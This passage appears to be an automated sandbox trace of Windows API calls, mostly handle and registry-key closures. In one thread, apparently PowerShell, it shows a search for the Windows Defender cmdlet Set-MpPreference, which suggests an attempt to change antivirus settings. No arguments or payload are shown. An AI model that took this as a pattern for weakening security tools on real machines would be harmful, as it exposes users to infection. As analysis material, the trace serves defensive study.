lpStrings=0x2ea369c*="Stopped", lpRawData=0x2ea3558) returned 1 [0153.467] GetLastError () returned 0x0 [0153.467] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0153.467] GetLastError () returned 0x0 [0153.469] CoGetContextToken (in: pToken=0x2df7a0 | out: pToken=0x2df7a0) returned 0x0 [0153.469] CObjectContext::QueryInterface () returned 0x0 [0153.469] CObjectContext::GetCurrentThreadType () returned 0x0 [0153.469] Release () returned 0x0 [0153.471] CoGetContextToken (in: pToken=0x2df578 | out: pToken=0x2df578) returned 0x0 [0153.471] CObjectContext::QueryInterface () returned 0x0 [0153.471] CObjectContext::GetCurrentThreadType () returned 0x0 [0153.471] Release () returned 0x0 [0153.473] CoGetContextToken (in: pToken=0x2df578 | out: pToken=0x2df578) returned 0x0 [0153.473] CObjectContext::QueryInterface () returned 0x0 [0153.473] CObjectContext::GetCurrentThreadType () returned 0x0 [0153.473] Release () returned 0x0 [0153.480] CoGetContextToken (in: pToken=0x2df578 | out: pToken=0x2df578) returned 0x0 [0153.480] CObjectContext::QueryInterface () returned 0x0 [0153.480] CObjectContext::GetCurrentThreadType () returned 0x0 [0153.480] Release () returned 0x0 [0153.537] CoGetContextToken (in: pToken=0x2df558 | out: pToken=0x2df558) returned 0x0 [0153.537] CObjectContext::QueryInterface () returned 0x0 [0153.538] CObjectContext::GetCurrentThreadType () returned 0x0 [0153.538] Release () returned 0x0 [0153.539] CoUninitialize () Thread: id = 160 os_tid = 0xb7c Thread: id = 161 os_tid = 0xb14 Thread: id = 162 os_tid = 0xb00 Thread: id = 163 os_tid = 0xaf8 Thread: id = 164 os_tid = 0xb10 [0129.651] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0139.880] LocalFree (hMem=0x3f6280) returned 0x0 [0139.880] GetLastError () returned 0x0 [0139.883] CloseHandle (hObject=0x340) returned 1 [0139.883] GetLastError () returned 0x0 [0139.883] CloseHandle (hObject=0x13) returned 1 [0139.884] GetLastError () returned 0x0 [0139.884] CloseHandle (hObject=0xf) returned 1 [0139.884] GetLastError () returned 0x0 [0139.884] RegCloseKey (hKey=0x324) returned 0x0 [0139.884] RegCloseKey (hKey=0x320) returned 0x0 [0139.884] RegCloseKey (hKey=0x31c) returned 0x0 [0139.884] LocalFree (hMem=0x3f62a0) returned 0x0 [0139.884] GetLastError () returned 0x0 [0139.885] RegCloseKey (hKey=0x34c) returned 0x0 [0145.107] RegCloseKey (hKey=0x34c) returned 0x0 [0146.707] RegCloseKey (hKey=0x398) returned 0x0 [0146.708] RegCloseKey (hKey=0x394) returned 0x0 [0146.708] RegCloseKey (hKey=0x390) returned 0x0 [0146.708] RegCloseKey (hKey=0x320) returned 0x0 [0146.708] RegCloseKey (hKey=0x3c4) returned 0x0 [0146.708] RegCloseKey (hKey=0x3c0) returned 0x0 [0146.708] RegCloseKey (hKey=0x388) returned 0x0 [0146.708] RegCloseKey (hKey=0x384) returned 0x0 [0146.709] RegCloseKey (hKey=0x380) returned 0x0 [0146.709] RegCloseKey (hKey=0x37c) returned 0x0 [0146.709] RegCloseKey (hKey=0x378) returned 0x0 [0146.709] RegCloseKey (hKey=0x374) returned 0x0 [0146.709] RegCloseKey (hKey=0x370) returned 0x0 [0146.709] RegCloseKey (hKey=0x36c) returned 0x0 [0146.710] RegCloseKey (hKey=0x3bc) returned 0x0 [0146.710] RegCloseKey (hKey=0x364) returned 0x0 [0146.710] RegCloseKey (hKey=0x360) returned 0x0 [0146.710] RegCloseKey (hKey=0x35c) returned 0x0 [0146.710] RegCloseKey (hKey=0x358) returned 0x0 [0146.711] RegCloseKey (hKey=0x354) returned 0x0 [0146.711] RegCloseKey (hKey=0x350) returned 0x0 [0146.711] RegCloseKey (hKey=0x340) returned 0x0 [0146.711] RegCloseKey (hKey=0x324) returned 0x0 [0146.711] RegCloseKey (hKey=0x3b8) returned 0x0 [0146.711] RegCloseKey (hKey=0x31c) returned 0x0 [0146.712] RegCloseKey (hKey=0x34c) returned 0x0 [0146.712] RegCloseKey (hKey=0x3b4) returned 0x0 [0146.712] RegCloseKey (hKey=0x3b0) returned 0x0 [0146.712] RegCloseKey (hKey=0x38c) returned 0x0 [0146.712] RegCloseKey (hKey=0x3c8) returned 0x0 [0146.713] RegCloseKey (hKey=0x3a8) returned 0x0 [0146.713] RegCloseKey (hKey=0x3a4) returned 0x0 [0146.713] RegCloseKey (hKey=0x3a0) returned 0x0 [0146.713] RegCloseKey (hKey=0x39c) returned 0x0 [0149.914] RegCloseKey (hKey=0x360) returned 0x0 [0153.473] GetLastError () returned 0x0 [0153.473] GetLastError () returned 0x0 [0153.473] LocalFree (hMem=0x3ee530) returned 0x0 [0153.473] GetLastError () returned 0x0 [0153.473] GetLastError () returned 0x0 [0153.473] GetLastError () returned 0x0 [0153.473] LocalFree (hMem=0x3ee4a8) returned 0x0 [0153.473] GetLastError () returned 0x0 [0153.480] DeregisterEventSource (hEventLog=0x2b20004) returned 1 [0153.505] GetLastError () returned 0x0 [0153.516] CloseHandle (hObject=0x3d4) returned 1 [0153.516] GetLastError () returned 0x0 [0153.516] CloseHandle (hObject=0x3d0) returned 1 [0153.516] GetLastError () returned 0x0 [0153.516] CloseHandle (hObject=0x3ac) returned 1 [0153.517] GetLastError () returned 0x0 [0153.517] CloseHandle (hObject=0x398) returned 1 [0153.517] GetLastError () returned 0x0 [0153.517] CloseHandle (hObject=0x394) returned 1 [0153.517] GetLastError () returned 0x0 [0153.517] CloseHandle (hObject=0x390) returned 1 [0153.517] GetLastError () returned 0x0 [0153.517] CloseHandle (hObject=0x320) returned 1 [0153.517] GetLastError () returned 0x0 [0153.518] CloseHandle (hObject=0x3c4) returned 1 [0153.518] GetLastError () returned 0x0 [0153.518] CloseHandle (hObject=0x3c0) returned 1 [0153.518] GetLastError () returned 0x0 [0153.518] CloseHandle (hObject=0x388) returned 1 [0153.518] GetLastError () returned 0x0 [0153.518] CloseHandle (hObject=0xf) returned 1 [0153.519] GetLastError () returned 0x0 [0153.519] CloseHandle (hObject=0x7f) returned 1 [0153.519] GetLastError () returned 0x0 [0153.519] CloseHandle (hObject=0x7b) returned 1 [0153.519] GetLastError () returned 0x0 [0153.520] CloseHandle (hObject=0x77) returned 1 [0153.520] GetLastError () returned 0x0 [0153.520] CloseHandle (hObject=0x73) returned 1 [0153.520] GetLastError () returned 0x0 [0153.520] CloseHandle (hObject=0x6f) returned 1 [0153.521] GetLastError () returned 0x0 [0153.521] CloseHandle (hObject=0x6b) returned 1 [0153.521] GetLastError () returned 0x0 [0153.521] CloseHandle (hObject=0x67) returned 1 [0153.522] GetLastError () returned 0x0 [0153.522] CloseHandle (hObject=0x63) returned 1 [0153.522] GetLastError () returned 0x0 [0153.522] CloseHandle (hObject=0x5f) returned 1 [0153.522] GetLastError () returned 0x0 [0153.523] CloseHandle (hObject=0x5b) returned 1 [0153.523] GetLastError () returned 0x0 [0153.523] CloseHandle (hObject=0x57) returned 1 [0153.523] GetLastError () returned 0x0 [0153.523] CloseHandle (hObject=0x53) returned 1 [0153.524] GetLastError () returned 0x0 [0153.524] CloseHandle (hObject=0x4f) returned 1 [0153.524] GetLastError () returned 0x0 [0153.524] CloseHandle (hObject=0x4b) returned 1 [0153.525] GetLastError () returned 0x0 [0153.525] CloseHandle (hObject=0x47) returned 1 [0153.525] GetLastError () returned 0x0 [0153.525] CloseHandle (hObject=0x358) returned 1 [0153.525] GetLastError () returned 0x0 [0153.525] CloseHandle (hObject=0x354) returned 1 [0153.525] GetLastError () returned 0x0 [0153.526] CloseHandle (hObject=0x350) returned 1 [0153.526] GetLastError () returned 0x0 [0153.526] CloseHandle (hObject=0x340) returned 1 [0153.526] GetLastError () returned 0x0 [0153.526] CloseHandle (hObject=0x324) returned 1 [0153.526] GetLastError () returned 0x0 [0153.526] CloseHandle (hObject=0x3b8) returned 1 [0153.526] GetLastError () returned 0x0 [0153.526] CloseHandle (hObject=0x31c) returned 1 [0153.526] GetLastError () returned 0x0 [0153.527] CloseHandle (hObject=0x34c) returned 1 [0153.527] GetLastError () returned 0x0 [0153.527] CloseHandle (hObject=0x3b4) returned 1 [0153.527] GetLastError () returned 0x0 [0153.527] CloseHandle (hObject=0x3b0) returned 1 [0153.527] GetLastError () returned 0x0 [0153.527] CloseHandle (hObject=0x38c) returned 1 [0153.527] GetLastError () returned 0x0 [0153.527] CloseHandle (hObject=0x3c8) returned 1 [0153.528] GetLastError () returned 0x0 [0153.528] CloseHandle (hObject=0x43) returned 1 [0153.528] GetLastError () returned 0x0 [0153.528] CloseHandle (hObject=0x3f) returned 1 [0153.528] GetLastError () returned 0x0 [0153.529] CloseHandle (hObject=0x3b) returned 1 [0153.529] GetLastError () returned 0x0 [0153.529] CloseHandle (hObject=0x37) returned 1 [0153.529] GetLastError () returned 0x0 [0153.530] CloseHandle (hObject=0x33) returned 1 [0153.530] GetLastError () returned 0x0 [0153.530] CloseHandle (hObject=0x2f) returned 1 [0153.530] GetLastError () returned 0x0 [0153.530] CloseHandle (hObject=0x2b) returned 1 [0153.531] GetLastError () returned 0x0 [0153.531] CloseHandle (hObject=0x27) returned 1 [0153.531] GetLastError () returned 0x0 [0153.531] CloseHandle (hObject=0x23) returned 1 [0153.532] GetLastError () returned 0x0 [0153.532] CloseHandle (hObject=0x1f) returned 1 [0153.532] GetLastError () returned 0x0 [0153.532] CloseHandle (hObject=0x35c) returned 1 [0153.532] GetLastError () returned 0x0 [0153.532] CloseHandle (hObject=0x1b) returned 1 [0153.533] GetLastError () returned 0x0 [0153.533] CloseHandle (hObject=0x17) returned 1 [0153.533] GetLastError () returned 0x0 [0153.533] CloseHandle (hObject=0x13) returned 1 [0153.534] GetLastError () returned 0x0 [0153.534] CloseHandle (hObject=0x338) returned 1 [0153.534] GetLastError () returned 0x0 [0153.534] RegCloseKey (hKey=0x3e4) returned 0x0 [0153.534] UnmapViewOfFile (lpBaseAddress=0x2730000) returned 1 [0153.535] CloseHandle (hObject=0x348) returned 1 [0153.535] GetLastError () returned 0x0 [0153.535] RegCloseKey (hKey=0x80000004) returned 0x0 [0153.535] CloseHandle (hObject=0x304) returned 1 [0153.535] GetLastError () returned 0x0 [0153.535] CloseHandle (hObject=0x3e0) returned 1 [0153.536] GetLastError () returned 0x0 [0153.536] CloseHandle (hObject=0x3dc) returned 1 [0153.536] GetLastError () returned 0x0 [0153.536] CloseHandle (hObject=0x3d8) returned 1 [0153.536] GetLastError () returned 0x0 Thread: id = 210 os_tid = 0x568 [0149.278] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0149.366] SetThreadUILanguage (LangId=0x0) returned 0x409 [0149.370] VirtualQuery (in: lpAddress=0x5d8e0d0, lpBuffer=0x5d8f0d0, dwLength=0x1c | out: lpBuffer=0x5d8f0d0*(BaseAddress=0x5d8e000, AllocationBase=0x5400000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.542] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448500, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.542] GetLastError () returned 0xcb [0149.545] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448500, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.545] GetLastError () returned 0xcb [0149.546] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448500, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.547] GetLastError () returned 0xcb [0149.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448500, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.568] GetLastError () returned 0xcb [0149.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448500, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.596] GetLastError () returned 0xcb [0149.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448500, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.597] GetLastError () returned 0xcb [0149.660] VirtualQuery (in: lpAddress=0x5d8e1ec, lpBuffer=0x5d8f1ec, dwLength=0x1c | out: lpBuffer=0x5d8f1ec*(BaseAddress=0x5d8e000, AllocationBase=0x5400000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.661] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448500, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.661] GetLastError () returned 0xcb [0149.663] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448500, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.663] GetLastError () returned 0xcb [0149.663] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448500, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.663] GetLastError () returned 0xcb [0149.697] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448500, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.697] GetLastError () returned 0xcb [0149.743] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448500, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.743] GetLastError () returned 0xcb [0149.832] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448500, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.832] GetLastError () returned 0xcb [0149.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448500, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.833] GetLastError () returned 0xcb [0149.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448500, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.834] GetLastError () returned 0xcb [0149.836] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448500, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.836] GetLastError () returned 0xcb [0149.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448500, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.837] GetLastError () returned 0xcb [0149.838] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448500, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.838] GetLastError () returned 0xcb [0149.839] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448500, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.839] GetLastError () returned 0xcb [0149.888] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448500, nSize=0x80 | out: lpBuffer="") returned 0x0 [0149.888] GetLastError () returned 0xcb [0149.967] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x448558, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0149.967] GetLastError () returned 0xcb [0149.971] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x448558, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0149.971] GetLastError () returned 0xcb [0150.000] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x449110 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0150.000] GetLastError () returned 0xcb [0150.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.023] GetLastError () returned 0xcb [0150.024] SetErrorMode (uMode=0x1) returned 0x1 [0150.027] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.ps1", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.027] GetLastError () returned 0x2 [0150.027] SetErrorMode (uMode=0x1) returned 0x1 [0150.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.029] GetLastError () returned 0x2 [0150.029] SetErrorMode (uMode=0x1) returned 0x1 [0150.029] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.psm1", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.029] GetLastError () returned 0x2 [0150.029] SetErrorMode (uMode=0x1) returned 0x1 [0150.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.029] GetLastError () returned 0x2 [0150.029] SetErrorMode (uMode=0x1) returned 0x1 [0150.029] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.psd1", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.029] GetLastError () returned 0x2 [0150.029] SetErrorMode (uMode=0x1) returned 0x1 [0150.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.030] GetLastError () returned 0x2 [0150.030] SetErrorMode (uMode=0x1) returned 0x1 [0150.030] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.COM", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.030] GetLastError () returned 0x2 [0150.030] SetErrorMode (uMode=0x1) returned 0x1 [0150.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.030] GetLastError () returned 0x2 [0150.030] SetErrorMode (uMode=0x1) returned 0x1 [0150.030] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.EXE", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.030] GetLastError () returned 0x2 [0150.030] SetErrorMode (uMode=0x1) returned 0x1 [0150.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.030] GetLastError () returned 0x2 [0150.031] SetErrorMode (uMode=0x1) returned 0x1 [0150.031] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.BAT", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.031] GetLastError () returned 0x2 [0150.031] SetErrorMode (uMode=0x1) returned 0x1 [0150.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.031] GetLastError () returned 0x2 [0150.031] SetErrorMode (uMode=0x1) returned 0x1 [0150.031] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.CMD", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.031] GetLastError () returned 0x2 [0150.031] SetErrorMode (uMode=0x1) returned 0x1 [0150.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.031] GetLastError () returned 0x2 [0150.031] SetErrorMode (uMode=0x1) returned 0x1 [0150.031] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.VBS", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.031] GetLastError () returned 0x2 [0150.032] SetErrorMode (uMode=0x1) returned 0x1 [0150.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.032] GetLastError () returned 0x2 [0150.032] SetErrorMode (uMode=0x1) returned 0x1 [0150.032] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.VBE", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.032] GetLastError () returned 0x2 [0150.032] SetErrorMode (uMode=0x1) returned 0x1 [0150.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.032] GetLastError () returned 0x2 [0150.032] SetErrorMode (uMode=0x1) returned 0x1 [0150.032] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.JS", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.032] GetLastError () returned 0x2 [0150.032] SetErrorMode (uMode=0x1) returned 0x1 [0150.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.032] GetLastError () returned 0x2 [0150.032] SetErrorMode (uMode=0x1) returned 0x1 [0150.032] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.JSE", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.033] GetLastError () returned 0x2 [0150.033] SetErrorMode (uMode=0x1) returned 0x1 [0150.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.033] GetLastError () returned 0x2 [0150.033] SetErrorMode (uMode=0x1) returned 0x1 [0150.033] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.WSF", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.033] GetLastError () returned 0x2 [0150.033] SetErrorMode (uMode=0x1) returned 0x1 [0150.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.033] GetLastError () returned 0x2 [0150.033] SetErrorMode (uMode=0x1) returned 0x1 [0150.033] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.WSH", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.033] GetLastError () returned 0x2 [0150.033] SetErrorMode (uMode=0x1) returned 0x1 [0150.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.033] GetLastError () returned 0x2 [0150.033] SetErrorMode (uMode=0x1) returned 0x1 [0150.033] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.MSC", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.034] GetLastError () returned 0x2 [0150.034] SetErrorMode (uMode=0x1) returned 0x1 [0150.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.034] GetLastError () returned 0x2 [0150.034] SetErrorMode (uMode=0x1) returned 0x1 [0150.034] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.034] GetLastError () returned 0x2 [0150.034] SetErrorMode (uMode=0x1) returned 0x1 [0150.036] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.036] GetLastError () returned 0x2 [0150.036] SetErrorMode (uMode=0x1) returned 0x1 [0150.036] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.ps1", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.036] GetLastError () returned 0x2 [0150.036] SetErrorMode (uMode=0x1) returned 0x1 [0150.036] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.036] GetLastError () returned 0x2 [0150.036] SetErrorMode (uMode=0x1) returned 0x1 [0150.036] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.psm1", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.037] GetLastError () returned 0x2 [0150.037] SetErrorMode (uMode=0x1) returned 0x1 [0150.037] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.037] GetLastError () returned 0x2 [0150.037] SetErrorMode (uMode=0x1) returned 0x1 [0150.037] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.psd1", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.037] GetLastError () returned 0x2 [0150.037] SetErrorMode (uMode=0x1) returned 0x1 [0150.037] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.037] GetLastError () returned 0x2 [0150.037] SetErrorMode (uMode=0x1) returned 0x1 [0150.037] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.COM", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.037] GetLastError () returned 0x2 [0150.037] SetErrorMode (uMode=0x1) returned 0x1 [0150.037] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.037] GetLastError () returned 0x2 [0150.037] SetErrorMode (uMode=0x1) returned 0x1 [0150.038] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.EXE", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.038] GetLastError () returned 0x2 [0150.038] SetErrorMode (uMode=0x1) returned 0x1 [0150.038] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.038] GetLastError () returned 0x2 [0150.038] SetErrorMode (uMode=0x1) returned 0x1 [0150.038] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.BAT", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.038] GetLastError () returned 0x2 [0150.038] SetErrorMode (uMode=0x1) returned 0x1 [0150.038] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.038] GetLastError () returned 0x2 [0150.038] SetErrorMode (uMode=0x1) returned 0x1 [0150.038] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.CMD", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.038] GetLastError () returned 0x2 [0150.038] SetErrorMode (uMode=0x1) returned 0x1 [0150.038] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.038] GetLastError () returned 0x2 [0150.038] SetErrorMode (uMode=0x1) returned 0x1 [0150.039] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.VBS", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.039] GetLastError () returned 0x2 [0150.039] SetErrorMode (uMode=0x1) returned 0x1 [0150.039] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.039] GetLastError () returned 0x2 [0150.039] SetErrorMode (uMode=0x1) returned 0x1 [0150.039] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.VBE", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.039] GetLastError () returned 0x2 [0150.039] SetErrorMode (uMode=0x1) returned 0x1 [0150.039] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.039] GetLastError () returned 0x2 [0150.039] SetErrorMode (uMode=0x1) returned 0x1 [0150.039] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.JS", 